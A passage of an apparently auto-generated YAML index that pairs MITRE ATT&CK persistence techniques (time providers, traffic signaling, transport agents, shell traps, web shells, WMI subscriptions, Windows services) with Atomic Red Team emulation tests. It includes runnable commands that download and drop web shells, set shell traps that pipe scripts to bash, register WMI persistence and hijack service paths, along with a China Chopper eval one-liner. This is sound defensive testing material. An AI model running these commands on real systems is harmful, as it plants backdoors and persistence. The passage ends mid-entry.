(Citation: Microsoft TimeProvider) - - Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\. (Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed. (Citation: Microsoft TimeProvider) - - Adversaries may abuse this architecture to establish persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account. (Citation: Github W32Time Oct 2017) - id: attack-pattern--61afc315-860c-4364-825d-0d62b2e91edc - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-25T15:24:26.476Z' - created: '2020-01-24T15:51:52.317Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - SYSTEM - - Administrator - x_mitre_detection: |- - Baseline values and monitor/analyze activity related to modifying W32Time information in the Registry, including application programming interface (API) calls such as RegCreateKeyEx and RegSetValueEx as well as execution of the W32tm.exe utility. (Citation: Microsoft W32Time May 2017) There is no restriction on the number of custom time providers registrations, though each may require a DLL payload written to disk. (Citation: Github W32Time Oct 2017) - - The Sysinternals Autoruns tool may also be used to analyze auto-starting locations, including DLLs listed as time providers. 
(Citation: TechNet Autoruns) - x_mitre_data_sources: - - API monitoring - - Binary file metadata - - DLL monitoring - - File monitoring - - Loaded DLLs - - Process monitoring - x_mitre_contributors: - - Scott Lundgren, @5twenty9, Carbon Black - x_mitre_platforms: - - Windows - atomic_tests: [] - T1205: - technique: - revoked: false - id: attack-pattern--451a9977-d255-43c9-b431-66de80130c8c - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Traffic Signaling - description: |- - Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software. - - Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s). - - The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs. 
- - On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.(Citation: Cisco Synful Knock Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture. - external_references: - - source_name: mitre-attack - external_id: T1205 - url: https://attack.mitre.org/techniques/T1205 - - url: https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631 - description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible - backdoor. Retrieved October 13, 2018.' - source_name: Hartrell cd00r 2002 - - source_name: Cisco Synful Knock Evolution - url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices - description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco - IOS devices. Retrieved October 19, 2020. - - source_name: FireEye - Synful Knock - url: https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-_acis.html - description: Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful - Knock - A Cisco router implant - Part I. Retrieved October 19, 2020. - - source_name: Cisco Blog Legacy Device Attacks - url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 - description: Omar Santos. (2020, October 19). Attackers Continue to Target - Legacy Devices. Retrieved October 20, 2020. 
- object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: command-and-control - modified: '2020-10-21T15:30:44.964Z' - created: '2018-04-18T17:59:24.739Z' - x_mitre_contributors: - - Josh Day, Gigamon - x_mitre_data_sources: - - Packet capture - - Netflow/Enclave netflow - x_mitre_permissions_required: - - User - x_mitre_platforms: - - Linux - - macOS - - Windows - - Network - x_mitre_network_requirements: true - x_mitre_detection: Record network packets sent to and from the system, looking - for extraneous packets that do not belong to established flows. - x_mitre_defense_bypassed: - - Defensive network service scanning - x_mitre_version: '2.1' - x_mitre_is_subtechnique: false - atomic_tests: [] - T1505.002: - technique: - external_references: - - source_name: mitre-attack - external_id: T1505.002 - url: https://attack.mitre.org/techniques/T1505/002 - - source_name: Microsoft TransportAgent Jun 2016 - url: https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help - description: Microsoft. (2016, June 1). Transport agents. Retrieved June 24, - 2019. - - source_name: ESET LightNeuron May 2019 - url: https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf - description: 'Faou, M. (2019, May). Turla LightNeuron: One email away from - remote code execution. Retrieved June 24, 2019.' - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Transport Agent - description: "Adversaries may abuse Microsoft transport agents to establish - persistent access to systems. 
Microsoft Exchange transport agents can operate - on email messages passing through the transport pipeline to perform various - tasks such as filtering spam, filtering malicious attachments, journaling, - or adding a corporate signature to the end of all outgoing emails.(Citation: - Microsoft TransportAgent Jun 2016)(Citation: ESET LightNeuron May 2019) Transport - agents can be written by application developers and then compiled to .NET - assemblies that are subsequently registered with the Exchange server. Transport - agents will be invoked during a specified stage of email processing and carry - out developer defined tasks. \n\nAdversaries may register a malicious transport - agent to provide a persistence mechanism in Exchange Server that can be triggered - by adversary-specified email events.(Citation: ESET LightNeuron May 2019) - Though a malicious transport agent may be invoked for all emails passing through - the Exchange transport pipeline, the agent can be configured to only carry - out specific tasks in response to adversary defined criteria. For example, - the transport agent may only carry out an action like copying in-transit attachments - and saving them for later exfiltration if the recipient email address matches - an entry on a list provided by the adversary. " - id: attack-pattern--35187df2-31ed-43b6-a1f5-2f1d3d58d3f1 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-25T22:59:59.124Z' - created: '2019-12-12T15:08:20.972Z' - x_mitre_detection: Consider monitoring application logs for abnormal behavior - that may indicate suspicious installation of application software components. - Consider monitoring file locations associated with the installation of new - application software components such as paths from which applications typically - load such extensible components. 
- x_mitre_data_sources: - - Application logs - - File monitoring - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - SYSTEM - - Administrator - - root - x_mitre_contributors: - - ESET - - " Christoffer Strömblad" - x_mitre_platforms: - - Linux - - Windows - identifier: T1505.002 - atomic_tests: - - name: Install MS Exchange Transport Agent Persistence - auto_generated_guid: 43e92449-ff60-46e9-83a3-1a38089df94d - description: | - Install a Microsoft Exchange Transport Agent for persistence. This requires execution from an Exchange Client Access Server and the creation of a DLL with specific exports. Seen in use by Turla. - More details- https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help - supported_platforms: - - windows - input_arguments: - class_factory: - description: Class factory of transport agent. - type: string - default: Microsoft.Exchange.Security.Interop.SecurityInteropAgentFactory - dll_path: - description: Path of DLL to use as transport agent. - type: path - default: c:\program files\microsoft\Exchange Server\v15\bin\Microsoft.Exchange.Security.Interop.dll - transport_agent_identity: - description: Friendly name of transport agent once installed. 
- type: string - default: Security Interop Agent - dependencies: - - description: 'Microsoft Exchange SnapIn must be installed - -' - prereq_command: 'Get-TransportAgent -TransportService FrontEnd - -' - get_prereq_command: 'Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn - -' - executor: - command: | - Install-TransportAgent -Name #{transport_agent_identity} -TransportAgentFactory #{class_factory} -AssemblyPath #{dll_path} - Enable-TransportAgent #{transport_agent_identity} - Get-TransportAgent | Format-List Name,Enabled - cleanup_command: | - if(Get-Command "Get-TransportAgent" -ErrorAction Ignore){ - Disable-TransportAgent #{transport_agent_identity} - Uninstall-TransportAgent #{transport_agent_identity} - Get-TransportAgent - } - name: powershell - elevation_required: true - T1546.005: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.005 - url: https://attack.mitre.org/techniques/T1546/005 - - source_name: Trap Manual - url: https://ss64.com/bash/trap.html - description: ss64. (n.d.). trap. Retrieved May 21, 2019. - - source_name: Cyberciti Trap Statements - url: https://bash.cyberciti.biz/guide/Trap_statement - description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21, - 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Trap - description: |- - Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c and ctrl+d. - - Adversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. 
Trap commands are of the following format trap 'command list' signals where "command list" will be executed when "signals" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements) - id: attack-pattern--63220765-d418-44de-8fae-694b3912317d - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-24T16:43:02.273Z' - created: '2020-01-24T14:17:43.906Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - - Administrator - x_mitre_detection: Trap commands must be registered for the shell or programs, - so they appear in files. Monitoring files for suspicious or overly broad trap - commands can narrow down suspicious behavior during an investigation. Monitor - for suspicious processes executed through trap interrupts. - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - File monitoring - x_mitre_platforms: - - macOS - - Linux - identifier: T1546.005 - atomic_tests: - - name: Trap - auto_generated_guid: a74b2e07-5952-4c03-8b56-56274b076b61 - description: | - After exiting the shell, the script will download and execute. - After sending a keyboard interrupt (CTRL+C) the script will download and execute. 
- supported_platforms: - - macos - - linux - executor: - command: | - trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh | bash" EXIT - exit - trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh | bash" SIGINt - name: sh - T1078: - technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1078 - url: https://attack.mitre.org/techniques/T1078 - - external_id: CAPEC-560 - source_name: capec - url: https://capec.mitre.org/data/definitions/560.html - - url: https://technet.microsoft.com/en-us/library/dn535501.aspx - description: Microsoft. (2016, April 15). Attractive Accounts for Credential - Theft. Retrieved June 3, 2016. - source_name: TechNet Credential Theft - - url: https://technet.microsoft.com/en-us/library/dn487457.aspx - description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved - June 3, 2016. - source_name: TechNet Audit Policy - description: |- - Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence. 
- - The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft) - name: Valid Accounts - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: initial-access - modified: '2020-10-19T16:01:22.724Z' - created: '2017-05-31T21:31:00.645Z' - x_mitre_version: '2.1' - x_mitre_data_sources: - - AWS CloudTrail logs - - Stackdriver logs - - Authentication logs - - Process monitoring - x_mitre_defense_bypassed: - - Firewall - - Host intrusion prevention systems - - Network intrusion detection system - - Application control - - System access controls - - Anti-virus - x_mitre_detection: |- - Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. 
Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). - - Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately. - x_mitre_permissions_required: - - User - - Administrator - x_mitre_effective_permissions: - - User - - Administrator - x_mitre_platforms: - - Linux - - macOS - - Windows - - AWS - - GCP - - Azure - - SaaS - - Office 365 - - Azure AD - x_mitre_contributors: - - Netskope - - Mark Wee - - Praetorian - x_mitre_is_subtechnique: false - atomic_tests: [] - T1505.003: - technique: - created: '2019-12-13T16:46:18.927Z' - modified: '2020-09-16T19:34:19.752Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - type: attack-pattern - id: attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb - description: "Adversaries may backdoor web servers with web shells to establish - persistent access to systems. A Web shell is a Web script that is placed on - an openly accessible Web server to allow an adversary to use the Web server - as a gateway into a network. 
A Web shell may provide a set of functions to - execute or a command-line interface on the system that hosts the Web server.\n\nIn - addition to a server-side script, a Web shell may have a client interface - program that is used to talk to the Web server (ex: [China Chopper](https://attack.mitre.org/software/S0020) - Web shell client).(Citation: Lee 2013) " - name: Web Shell - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1505.003 - url: https://attack.mitre.org/techniques/T1505/003 - - external_id: CAPEC-650 - source_name: capec - url: https://capec.mitre.org/data/definitions/650.html - - source_name: Lee 2013 - description: Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down - the China Chopper Web Shell - Part I. Retrieved March 27, 2015. - url: https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html - - url: https://www.us-cert.gov/ncas/alerts/TA15-314A - description: US-CERT. (2015, November 13). Compromised Web Servers and Web - Shells - Threat Awareness and Guidance. Retrieved June 8, 2016. - source_name: US-CERT Alert TA15-314A Web Shells - x_mitre_platforms: - - Linux - - Windows - - macOS - x_mitre_data_sources: - - Process monitoring - - Netflow/Enclave netflow - - File monitoring - - Authentication logs - x_mitre_detection: "Web shells can be difficult to detect. Unlike other forms - of persistent remote access, they do not initiate connections. The portion - of the Web shell that is on the server may be small and innocuous looking. - The PHP version of the China Chopper Web shell, for example, is the following - short payload: (Citation: Lee 2013) \n\n<?php @eval($_POST['password']);>\n\nNevertheless, - detection mechanisms exist. 
Process monitoring may be used to detect Web servers - that perform suspicious actions such as running cmd.exe or accessing files - that are not in the Web directory. File monitoring may be used to detect changes - to files in the Web directory of a Web server that do not match with updates - to the Web server's content and may indicate implantation of a Web shell script. - Log authentication attempts to the server and any unusual traffic patterns - to or from the server and internal network. (Citation: US-CERT Alert TA15-314A - Web Shells) " - x_mitre_permissions_required: - - SYSTEM - - User - x_mitre_system_requirements: - - Adversary access to Web server with vulnerability or account to upload and - serve the Web shell file. - x_mitre_is_subtechnique: true - x_mitre_version: '1.1' - identifier: T1505.003 - atomic_tests: - - name: Web Shell Written to Disk - auto_generated_guid: 0a2ce662-1efa-496f-a472-2fe7b080db16 - description: | - This test simulates an adversary leveraging Web Shells by simulating the file modification to disk. - Idea from APTSimulator. 
- cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx - supported_platforms: - - windows - input_arguments: - web_shell_path: - description: The path to drop the web shell - type: string - default: C:\inetpub\wwwroot - web_shells: - description: Path of Web Shell - type: path - default: PathToAtomicsFolder\T1505.003\src\ - dependency_executor_name: powershell - dependencies: - - description: 'Web shell must exist on disk at specified location (#{web_shells}) - -' - prereq_command: 'if (Test-Path #{web_shells}) {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "#{web_shells}/b.jsp" - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "#{web_shells}/test.jsp" - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/cmd.aspx" -OutFile "#{web_shells}/cmd.aspx" - executor: - command: 'xcopy #{web_shells} #{web_shell_path} - -' - cleanup_command: 'del #{web_shell_path} /q >nul 2>&1 - -' - name: command_prompt - T1546.003: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.003 - url: https://attack.mitre.org/techniques/T1546/003 - - url: https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf - description: 'Mandiant. (2015, February 24). M-Trends 2015: A View from the - Front Lines. Retrieved May 18, 2016.' - source_name: Mandiant M-Trends 2015 - - source_name: FireEye WMI SANS 2015 - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf - description: Devon Kerr. (2015). There's Something About WMI. Retrieved May - 4, 2020. 
- - url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf - description: Ballenthin, W., et al. (2015). Windows Management Instrumentation - (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016. - source_name: FireEye WMI 2015 - - url: https://www.secureworks.com/blog/wmi-persistence - description: Dell SecureWorks Counter Threat Unit™ (CTU) Research Team. (2016, - March 28). A Novel WMI Persistence Implementation. Retrieved March 30, 2016. - source_name: Dell WMI Persistence - - source_name: Microsoft MOF May 2018 - url: https://docs.microsoft.com/en-us/windows/win32/wmisdk/managed-object-format--mof- - description: Satran, M. (2018, May 30). Managed Object Format (MOF). Retrieved - January 24, 2020. - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - - description: French, D. (2018, October 9). Detecting & Removing an Attacker’s - WMI Persistence. Retrieved October 11, 2019. - url: https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96 - source_name: Medium Detecting WMI Persistence - - source_name: Microsoft Register-WmiEvent - url: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/register-wmievent?view=powershell-5.1 - description: Microsoft. (n.d.). Retrieved January 24, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Windows Management Instrumentation Event Subscription - description: |- - Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. 
WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime. (Citation: Mandiant M-Trends 2015) - - Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018) - - WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges. - id: attack-pattern--910906dd-8c0a-475a-9cc1-5e029e2fad58 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-05-05T12:02:45.522Z' - created: '2020-01-24T14:07:56.276Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - SYSTEM - x_mitre_detection: |- - Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns) (Citation: Medium Detecting WMI Persistence) - - Monitor processes and command-line arguments that can be used to register WMI persistence, such as the Register-WmiEvent [PowerShell](https://attack.mitre.org/techniques/T1086) cmdlet (Citation: Microsoft Register-WmiEvent), as well as those that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process). 
- x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - WMI Objects - x_mitre_platforms: - - Windows - identifier: T1546.003 - atomic_tests: - - name: Persistence via WMI Event Subscription - auto_generated_guid: 3c64f177-28e2-49eb-a799-d767b24dd1e0 - description: | - Run from an administrator powershell window. After running, reboot the victim machine. - After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. - - Code references - - https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af - - https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545 - supported_platforms: - - windows - executor: - command: | - $FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; - EventNameSpace='root\CimV2'; - QueryLanguage="WQL"; - Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"}; - $Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs - - $ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; - CommandLineTemplate="$($Env:SystemRoot)\System32\notepad.exe";} - $Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs - - $FilterToConsumerArgs = @{ - Filter = [Ref] $Filter; - Consumer = [Ref] $Consumer; - } - $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs - cleanup_command: | - $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" - $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" - 
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue - $FilterConsumerBindingToCleanup | Remove-WmiObject - $EventConsumerToCleanup | Remove-WmiObject - $EventFilterToCleanup | Remove-WmiObject - name: powershell - elevation_required: true - T1543.003: - technique: - id: attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32 - description: "Adversaries may create or modify Windows services to repeatedly - execute malicious payloads as part of persistence. When Windows boots up, - it starts programs or applications called services that perform background - system functions.(Citation: TechNet Services) Windows service configuration - information, including the file path to the service's executable or recovery - programs/commands, is stored in the Windows Registry. Service configurations - can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075). - \n\nAdversaries may install a new service or modify an existing service by - using system utilities to interact with services, by directly modifying the - Registry, or by using custom tools to interact with the Windows API. Adversaries - may configure services to execute at startup in order to persist on a system.\n\nAn - adversary may also incorporate [Masquerading](https://attack.mitre.org/techniques/T1036) - by using a service name from a related operating system or benign software, - or by modifying existing services to make detection analysis more challenging. - Modifying existing services may interrupt their functionality or may enable - services that are disabled or otherwise not commonly used. \n\nServices may - be created with administrator privileges but are executed under SYSTEM privileges, - so an adversary may also use a service to escalate privileges from administrator - to SYSTEM. 
Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). " - name: Windows Service - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1543.003 - url: https://attack.mitre.org/techniques/T1543/003 - - external_id: CAPEC-478 - source_name: capec - url: https://capec.mitre.org/data/definitions/478.html - - external_id: CAPEC-550 - source_name: capec - url: https://capec.mitre.org/data/definitions/550.html - - external_id: CAPEC-551 - source_name: capec - url: https://capec.mitre.org/data/definitions/551.html - - url: https://technet.microsoft.com/en-us/library/cc772408.aspx - description: Microsoft. (n.d.). Services. Retrieved June 7, 2016. - source_name: TechNet Services - - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 - description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. - Retrieved June 6, 2016. - source_name: TechNet Autoruns - - url: https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4697 - description: 'Miroshnikov, A. & Hall, J. (2017, April 18). 4697(S): A service - was installed in the system. Retrieved August 7, 2018.' - source_name: Microsoft 4697 APR 2017 - - url: https://docs.microsoft.com/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection - description: Hardy, T. & Hall, J. (2018, February 15). Use Windows Event Forwarding - to help with intrusion detection. Retrieved August 7, 2018. 
- source_name: Microsoft Windows Event Forwarding FEB 2018 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-09-16T15:49:58.490Z' - created: '2020-01-17T19:13:50.402Z' - x_mitre_platforms: - - Windows - x_mitre_is_subtechnique: true - x_mitre_version: '1.1' - x_mitre_detection: "Monitor processes and command-line arguments for actions - that could create or modify services. Command-line invocation of tools capable - of adding or modifying services may be unusual, depending on how systems are - typically used in a particular environment. Services may also be modified - through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) - and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional - logging may need to be configured to gather the appropriate data. Remote access - tools with built-in features may also interact directly with the Windows API - to perform these functions outside of typical system utilities. Collect service - utility execution and service binary path arguments used for analysis. Service - binary paths may even be changed to execute commands or scripts. \n\nLook - for changes to service Registry entries that do not correlate with known software, - patch cycles, etc. Service information is stored in the Registry at HKLM\\SYSTEM\\CurrentControlSet\\Services. - Changes to the binary path and the service startup type changed from manual - or disabled to automatic, if it does not typically do so, may be suspicious. 
- Tools such as Sysinternals Autoruns may also be used to detect system service - changes that could be attempts at persistence.(Citation: TechNet Autoruns) - \ \n\nCreation of new services may generate an alterable event (ex: Event - ID 4697 and/or 7045 (Citation: Microsoft 4697 APR 2017)(Citation: Microsoft - Windows Event Forwarding FEB 2018)). New, benign services may be created during - installation of new software.\n\nSuspicious program execution through services - may show up as outlier processes that have not been seen before when compared - against historical data. Look for abnormal process call trees from known services - and for execution of other commands that could relate to Discovery or other - adversary techniques. Data and events should not be viewed in isolation, but - as part of a chain of behavior that could lead to other activities, such as - network connections made for Command and Control, learning details about the - environment through Discovery, and Lateral Movement." - x_mitre_effective_permissions: - - Administrator - - SYSTEM - x_mitre_data_sources: - - API monitoring - - Windows event logs - - Process command-line parameters - - Process monitoring - - File monitoring - - Windows Registry - x_mitre_contributors: - - Matthew Demaske, Adaptforward - - Travis Smith, Tripwire - - Pedro Harrison - identifier: T1543.003 - atomic_tests: - - name: Modify Fax service to run PowerShell - auto_generated_guid: ed366cde-7d12-49df-a833-671904770b9f - description: | - This test will temporarily modify the service Fax by changing the binPath to PowerShell - and will then revert the binPath change, restoring Fax to its original state. - Upon successful execution, cmd will modify the binpath for `Fax` to spawn powershell. Powershell will then spawn. 
- supported_platforms: - - windows - executor: - name: command_prompt - elevation_required: true - command: | - sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1543.003 Test'\"" - sc start Fax - cleanup_command: sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe" >nul - 2>&1 - - name: Service Installation CMD - auto_generated_guid: 981e2942-e433-44e9-afc1-8c957a1496b6 - description: | - Download an executable from github and start it as a service. - Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout. - supported_platforms: - - windows - input_arguments: - binary_path: - description: Name of the service binary, include path. - type: Path - default: PathToAtomicsFolder\T1543.003\bin\AtomicService.exe - service_name: - description: Name of the Service - type: String - default: AtomicTestService_CMD - dependency_executor_name: powershell - dependencies: - - description: 'Service binary must exist on disk at specified location (#{binary_path}) - -' - prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1} - -' - get_prereq_command: | - 